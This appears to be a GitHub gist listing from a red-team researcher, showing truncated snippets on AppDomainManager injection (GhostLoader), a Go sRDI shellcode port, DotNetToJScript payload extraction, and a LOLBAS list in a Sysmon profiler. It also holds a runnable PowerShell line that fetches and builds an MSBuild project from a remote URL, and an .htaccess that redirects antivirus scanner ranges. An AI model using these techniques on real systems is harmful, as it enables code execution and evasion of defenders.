GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Leo Loobeek leoloobeek
leoloobeek
/ main.go
Last active
September 14, 2021 02:57
Quick 'n dirty script to match Amass results with in-scope networks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // go run main.go -amass amass.json -scope scope.txt | |
| import ( | |
| "bufio" | |
| "encoding/json" | |
| "flag" | |
| "fmt" | |
| "net" |
leoloobeek
/ _Instructions_Reproduce.md
Created
April 29, 2020 11:53
GhostLoader - AppDomainManager - Injection - 攻壳机动队
leoloobeek
/ ShellcodeRDI.go
Last active
January 23, 2023 16:49
Go implementation of https://github.com/monoxgas/sRDI/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| * | |
| * This is just a Go implementation of https://github.com/monoxgas/sRDI/ | |
| * Useful if you're trying to generate shellcode for reflective DLL | |
| * injection in Go, otherwise probably not much use :) | |
| * | |
| * The project, shellcode, most comments within this project | |
| * are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas) |
leoloobeek
/ sysmon_lolbas_profiler.ps1
Created
January 28, 2019 23:38
Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://github.com/LOLBAS-Project/LOLBAS | |
| $lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep |
leoloobeek
/ JScriptToDotnet.js
Created
November 28, 2018 18:50
Sample Extract Payload DotNetToJScript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Base64 Raw Decoder | |
| function Base64Decode(str) { | |
| if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
| var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
| var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
| for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-PublicKey | |
| { | |
| [OutputType([byte[]])] | |
| PARAM ( | |
| [Uri]$Uri | |
| ) | |
| if (-Not ($uri.Scheme -eq "https")) | |
| { | |
| Write-Error "You can only get keys for https addresses" |
leoloobeek
/ Build_In_Memory_CSharp_Project.txt
Created
April 4, 2018 17:03
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] | |
| - Launch program (payload) |
leoloobeek
/ Build_In_Memory_CSharp_XSLT_Project.txt
Created
March 8, 2018 16:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In-memory PowerShell XSLT project build: | |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj") | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.build(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <data> | |
| <circle> | |
| <radius>12</radius> | |
| </circle> | |
| <circle> | |
| <radius>37.5</radius> | |
| </circle> | |
| </data> |
leoloobeek
/ .htaccess
Created
March 1, 2018 17:05
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # ForcePoint | |
| RewriteCond expr "-R '208.80.192.0/21'" [OR] | |
| # AWS & Other VT hosts | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] |
NewerOlder